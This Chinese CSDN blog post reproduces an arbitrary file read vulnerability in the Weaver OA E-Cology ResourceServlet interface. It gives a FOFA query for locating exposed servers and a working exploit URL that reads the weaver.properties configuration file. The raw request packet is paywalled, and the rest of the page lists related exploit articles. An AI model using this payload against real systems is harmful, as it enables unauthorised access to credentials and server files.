泛微OA E-Cology ResourceServlet接口存在任意文件读取漏洞 附POC

最新推荐文章于 2024-06-20 11:45:00 发布
最新推荐文章于 2024-06-20 11:45:00 发布
阅读量130 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/139143971
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 泛微OA E-Cology简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

泛微e-cology依托全新的设计理念,全新的管理思想为中大型组织创建全新的高效协同办公环境。

2.漏洞描述

泛微e-cology依托全新的设计理念,全新的管理思想。 为中大型组织创建全新的高效协同办公环境。 智能语音办公,简化软件操作界面。 身份认证、电子签名、电子签章、数据存证让合同全程数字化。泛微OA E-Cology ResourceServlet接口存在任意文件读取漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

泛微e-cology

图片

4.fofa查询语句

app="泛微-OA(e-cology)"

5.漏洞复现

漏洞链接:http://xxx.xxx.xxx.xxx/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties

漏洞数据包:

GET /weaver/org.
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
六零导航页SQL注入漏洞复现(CVE-2023-45951)
0xSec
10-26 1791
LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
六零导航页file.php接口存在任意文件上传漏洞
nnn2188185的博客
05-22 126
六零导航页file.php接口存在任意文件上传漏洞
漏洞复现】泛微OA E-Cology getE9DevelopAllNameValue2 任意文件读取漏洞
最新发布
凝聚力安全团队
06-20 260
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。
GeoServer发布地图服务(WMS、WFS)
人生海海 山山而川
01-07 3734
详细论述了使用GeoServer发布地图服务WMS和WFS的过程。
【0day】复现泛微OA e-cology 任意文件读取漏洞
记录并分享学习安全的知识点..
11-02 1002
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点存在任意文件读取漏洞,攻击者攻击者可以在未经授权的情况下读取系统上的任意文件
泛微OA e-cology8最新h5补丁
06-01
由于Flash已经停止更新,存在安全隐患且不被多数现代浏览器支持,所以此补丁的发布对于用户来说尤为重要,它确保了泛微OA e-cology8系统的稳定运行,并提升了移动设备上的使用体验。 【标签】"OA"代表办公自动化,...
泛微OA e-cology 8 最新webservice接口文档
12-11
泛微OA e-cology 8 最新webservice接口文档摘要 泛微OA e-cology 8 最新webservice接口文档提供了一系列的webservice接口,用于对系统中的文档进行操作,包括创建文档、删除文档、更新文档、查看文档等。这些接口...
泛微OA 9.0 e-cology9.0 数据字典
07-06
版本升级.zip 表单建模.zip 财务管理.zip 车辆管理.zip 短信模块.zip 工作流程.zip 工作微博.zip 公文管理.zip 会议管理.zip 即时通讯-EMESSAGE.zip 集成模块.zip 客户管理.zip 门户管理.zip ...workflow
泛微OA E-cology字段联动.rar
09-09
本压缩包文件泛微OA E-cology字段联动.rar”聚焦于该系统中的一个关键特性——字段联动,这是一种通过编程逻辑将不同字段之间的数据关联起来的技术,以提高数据输入的准确性和效率。这里我们将深入探讨字段联动的...
漏洞复现】泛微OA E-Cology ResourceServlet文件读取漏洞
晚风不及你
05-14 573
泛微OA E-Cology ResourceServlet存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件
LyLme Spage导航页面存在任意文件上传漏洞
weixin_43167326的博客
05-20 613
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。
漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞漏洞检测脚本)
jjjj1029056414的博客
12-25 1384
漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞带自己写的poc脚本
网络要素服务(WFS)详解
人生海海 山山而川
01-21 1277
通过实例详细介绍了WebGIS中网络要素服务(WFS)的具体内容。
漏洞复现】泛微OA E-cology8 SptmForPortalThumbnail.jsp 任意文件读取漏洞
凝聚力安全团队
06-19 370
泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微 e-cology8 的 SptmForPortalThumbnail.jsp 文件中的 preview 未进行安全过滤,攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 425
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982)
0xSec
05-18 853
六零导航页 file.php接口任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1200
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值